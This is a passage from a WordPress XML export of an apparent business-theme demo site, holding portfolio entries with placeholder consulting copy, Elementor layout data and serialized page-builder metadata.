		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>810</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:45:16]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:45:16]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[oct-analytics]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
		<category domain="portfolio_cat" nicename="strategy"><![CDATA[strategy]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[811]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.10]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"759b1f9d","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"4bee6d25","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"e966785","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"517cac51","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"1f78d6b4","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"50e4423d","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"5eda56ee","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5124a12","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"1813e19b","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2c9be0ed","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"5f5cb943","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"382ee553","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"ca083f3","elType":"widget","settings":{"editor":"<p>May 22, 2019<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"28cceda7","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5ef59f12","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"6fd44f36","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"2ca63cf2","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"6351dbe6","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"554e1868","elType":"section","settings":[],"elements":[{"id":"2f72473","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"70be8829","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3cf3deb","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"5c808748","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"e981ce8","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"274ec6af","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1b91f0dc","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"4d7b693a","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"1a4c42","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"5e1c6f7b","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"61a796cc","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"25cd15ba","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"28fd89ac","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"2ffc5a34","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"45d8407d","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"28b1f661","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"42652c90","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"4da6355b","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"154a0d41","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"5e570d41","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"71979cca","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #ff8523;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"75a7c43e","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"73569bcf","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project.png","id":784},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"dc598e7","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Financial Statements</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/financial-statements/</link>
		<pubDate>Fri, 11 Sep 2020 04:46:50 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=814</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>BusinessMax</p>		
			<h6>Website:</h6>		
		<p>businessmax.com</p>		
			<h6>Date:</h6>		
		<p>November 22, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>814</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:46:50]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:46:50]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[financial-statements]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="business"><![CDATA[business]]></category>
		<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[815]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.10]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"1deb4b19","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"19b383e9","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"500f054","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with 